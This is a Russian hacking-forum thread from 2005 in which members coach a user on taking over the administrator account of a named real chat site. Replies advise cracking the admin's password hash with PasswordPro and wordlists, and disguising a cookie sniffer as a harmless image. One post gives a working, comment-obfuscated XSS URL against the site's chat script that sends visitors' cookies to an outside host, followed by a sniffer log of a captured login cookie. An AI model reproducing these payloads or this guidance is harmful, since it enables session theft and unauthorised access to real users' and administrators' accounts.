Чаты Взлом пароля админа чата http://chat.ctc-tv.ru ?

Discussion in 'Веб-уязвимости' started by DJ Frost, 30 Sep 2005.

  1. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    я уже говорил об этом
     
  2. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    2 Антошка2003 я в курсе.. Он просто не понял... Вот и до словно пишу.. :)
     
  3. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Тот админ редко заходит. Ну получу я хеш? И что с ним делать?
     
  4. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    О а дальше брат серьёзное дело... Расшифровка.
    Качаешь PasswordPro и словариков к нему и начинаешь расшифровывать тот хэш который ты вытащил с форума.
     
  5. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Сможете помочь? :)
     
  6. NIGHT_WOLF

    NIGHT_WOLF Member

    Joined:
    17 Aug 2005
    Messages:
    192
    Likes Received:
    17
    Reputations:
    2
    С расшифровкой ?
     
  7. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Да, если можно. )
     
  8. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
  9. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    делай всё сам, всё написано доступным текстом, за тебя делать никто не будет, только советовать.
     
  10. /W0W3/s

    /W0W3/s HarD CorE

    Joined:
    18 Jun 2005
    Messages:
    646
    Likes Received:
    212
    Reputations:
    85
    и это правда... Если возникнут вопросы. пиши, только сначала ищи в форуме. Об этой теме очень много сказано тут.
     
  11. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
    и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...;)
     
    _________________________
  12. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Значит, как я понял, я получу со сниффера информацию, а затем её засуну в прогу для расшифрования хешей и получу пароль админа??? :)


    Тока проблем. А можно как-нить просечь, есть ли там база с пассами? Админ, который мне нужен очень редко заходит. Что в этом случаи делать?
     
  13. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    _________________________
  14. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    Влад, эт ты типа мне уже написал о том нашем разговоре?))))
    Я тоже думал об этом, просто ему еботни много, хотя...
     
  15. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    _http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>

    [Sun Oct 2 14:23:53 2005] IP=84.ххх.ххх.ххх SITE=chat.ctc-tv.ru
    REFERER=http://chat.ctc-tv.ru/cgi/newchat.exe?<script>img/**/=/**/new/**/Image();/**/img.src/**/=/**/"http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>
    QUERY=NAME=03862766249104212349; DISSID; DISNUM; login=extaze
    AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.2 (build 01102); .NET CLR 1.0.3705; Media Center PC 3.1; .NET CLR 1.1.4322)
     
    _________________________
  16. Антошка2003

    Антошка2003 Elder - Старейшина

    Joined:
    3 Apr 2005
    Messages:
    534
    Likes Received:
    66
    Reputations:
    49
    да это ничего не даст, пример ток.
     
  17. TANZWUT

    TANZWUT Крёстный отец :)

    Joined:
    22 Jun 2005
    Messages:
    1,474
    Likes Received:
    716
    Reputations:
    744
    а я ему пример и показал...
    я просто в логе снифа видел всякие там попытки...
     
    _________________________
    #37 TANZWUT, 2 Oct 2005
    Last edited: 2 Oct 2005
  18. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    Не х.я не получилось :( :(
     
  19. К.е.Н

    К.е.Н Дитё-Инвалид

    Joined:
    5 Jul 2005
    Messages:
    104
    Likes Received:
    3
    Reputations:
    2
    Цитата

    А лучше всего свой сниф, зальёш на сайт к примеру _http://url/pricol/pic1.gif
    и вместо прозрачной картинки поставиш любую прикольную картинку... и никто незаподозрит что это снифер, даже тот самый админ...Цитата
    Снивер ты туда не зальешь можно взломать через скрипты но пробовать тебе пбесплатно никто не будет.
     
  20. DJ Frost

    DJ Frost New Member

    Joined:
    24 Jul 2005
    Messages:
    15
    Likes Received:
    0
    Reputations:
    0
    А если упросить хотя бы показать, как через скрипты?